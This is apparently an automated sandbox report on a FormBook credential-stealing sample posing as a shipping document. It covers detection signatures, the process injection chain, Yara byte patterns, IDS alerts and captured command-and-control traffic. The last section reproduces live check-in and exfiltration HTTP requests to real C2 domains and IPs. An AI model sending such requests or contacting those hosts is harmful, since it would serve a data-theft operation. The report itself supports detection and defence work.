Edit tour

Windows Analysis Report
Shipping report#Cargo Handling.exe

Overview

General Information

Sample name:	Shipping report#Cargo Handling.exe
Analysis ID:	1511837
MD5:	d930bdc12b0d6c17c9004c0dac1d1f5b
SHA1:	b118fc0a049a79e08a2df407ceb0de2871fe0c2e
SHA256:	15ff4bad6e829e4c628dd982b57687b73b514f2c42d3d08923b7d66bf2f78e80
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Shipping report#Cargo Handling.exe (PID: 792 cmdline: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe" MD5: D930BDC12B0D6C17C9004C0DAC1D1F5B)

svchost.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

tfTpvPSAdwQ.exe (PID: 1076 cmdline: "C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 1216 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

tfTpvPSAdwQ.exe (PID: 5552 cmdline: "C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6888 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2fe53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18052:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3f6bab:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3dedaa:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3f6bab:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3dedaa:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.430000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.430000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.430000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.430000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe", CommandLine: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe", ParentImage: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe, ParentProcessId: 792, ParentProcessName: Shipping report#Cargo Handling.exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe", ProcessId: 2836, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe", CommandLine: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe", ParentImage: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe, ParentProcessId: 792, ParentProcessName: Shipping report#Cargo Handling.exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe", ProcessId: 2836, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-16T14:09:27.475976+0200	2855465	1	A Network Trojan was detected	192.168.2.4	49737	3.33.130.190	80	TCP
2024-09-16T14:09:51.823146+0200	2855465	1	A Network Trojan was detected	192.168.2.4	49741	13.228.81.39	80	TCP
2024-09-16T14:10:05.492878+0200	2855465	1	A Network Trojan was detected	192.168.2.4	49745	66.81.203.135	80	TCP
2024-09-16T14:10:19.513153+0200	2855465	1	A Network Trojan was detected	192.168.2.4	49749	103.42.108.46	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-16T14:09:44.001786+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49738	13.228.81.39	80	TCP
2024-09-16T14:09:46.444681+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49739	13.228.81.39	80	TCP
2024-09-16T14:09:49.272587+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49740	13.228.81.39	80	TCP
2024-09-16T14:09:57.845843+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49742	66.81.203.135	80	TCP
2024-09-16T14:10:00.239412+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49743	66.81.203.135	80	TCP
2024-09-16T14:10:02.777015+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49744	66.81.203.135	80	TCP
2024-09-16T14:10:11.893578+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49746	103.42.108.46	80	TCP
2024-09-16T14:10:14.427132+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49747	103.42.108.46	80	TCP
2024-09-16T14:10:16.973767+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49748	103.42.108.46	80	TCP
2024-09-16T14:10:25.330977+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49750	3.33.130.190	80	TCP
2024-09-16T14:10:28.222828+0200	2855464	1	A Network Trojan was detected	192.168.2.4	49751	3.33.130.190	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Shipping report#Cargo Handling.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: Shipping report#Cargo Handling.exe	ReversingLabs: Detection: 55%
Source: Shipping report#Cargo Handling.exe	Virustotal: Detection: 35%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.430000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3125347091.0000000004B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3123749348.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3122938454.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347774622.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347410534.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2347100196.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3122693034.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3123748800.0000000004C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Shipping report#Cargo Handling.exe

Joe Sandbox ML: detected

Source: Shipping report#Cargo Handling.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tfTpvPSAdwQ.exe, 00000005.00000002.3122668683.00000000000DE000.00000002.00000001.01000000.00000005.sdmp, tfTpvPSAdwQ.exe, 00000007.00000002.3122704527.00000000000DE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Shipping report#Cargo Handling.exe, 00000000.00000003.1877199075.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, Shipping report#Cargo Handling.exe, 00000000.00000003.1875419780.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347446716.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2249045941.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347446716.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2251065827.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3123980147.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2347219047.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3123980147.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2349415767.0000000002B51000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Shipping report#Cargo Handling.exe, 00000000.00000003.1877199075.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, Shipping report#Cargo Handling.exe, 00000000.00000003.1875419780.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2347446716.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2249045941.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347446716.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2251065827.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3123980147.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2347219047.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3123980147.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2349415767.0000000002B51000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.2313854482.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347212542.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000005.00000002.3123205892.00000000010E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.2313854482.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347212542.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000005.00000002.3123205892.00000000010E8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_001068EE FindFirstFileW,FindClose,	0_2_001068EE
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_0010698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0010698F
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_000FD076
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_000FD3A9
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00109642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00109642
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_0010979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0010979D
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00109B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00109B2B
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000FDBBE
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00105C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00105C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0012C0D0 FindFirstFileW,FindNextFileW,FindClose,	6_2_0012C0D0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	6_2_00119B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	6_2_00132168
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	6_2_00132185
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_02A504DF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 103.42.108.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 66.81.203.135:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 103.42.108.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 66.81.203.135:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 66.81.203.135:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 103.42.108.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 103.42.108.46:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 66.81.203.135:80

Source: Joe Sandbox View	IP Address: 13.228.81.39 13.228.81.39
Source: Joe Sandbox View	IP Address: 103.42.108.46 103.42.108.46

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View	ASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_0010CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0010CE44

Source: global traffic	HTTP traffic detected: GET /gqyt/?3vHty=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&fx=kLn8bpp8IVh HTTP/1.1Host: www.chamadaslotgiris.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /p5rq/?3vHty=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&fx=kLn8bpp8IVh HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /osde/?3vHty=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&fx=kLn8bpp8IVh HTTP/1.1Host: www.mediaplug.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /yl6y/?3vHty=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&fx=kLn8bpp8IVh HTTP/1.1Host: www.independent200.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.linkbasic.net
Source: global traffic	DNS traffic detected: DNS query: www.chamadaslotgiris.net
Source: global traffic	DNS traffic detected: DNS query: www.masteriocp.online
Source: global traffic	DNS traffic detected: DNS query: www.mediaplug.biz
Source: global traffic	DNS traffic detected: DNS query: www.independent200.org
Source: global traffic	DNS traffic detected: DNS query: www.tigre777gg.online

Source: unknown

HTTP traffic detected: POST /p5rq/ HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USConnection: closeContent-Length: 202Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.masteriocp.onlineReferer: http://www.masteriocp.online/p5rq/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 33 76 48 74 79 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 7a 67 70 6e 4e 70 74 51 59 2b 33 76 79 50 2b 33 77 41 68 36 44 78 45 70 6d 5a 61 69 36 2b 53 6f 67 3d 3d 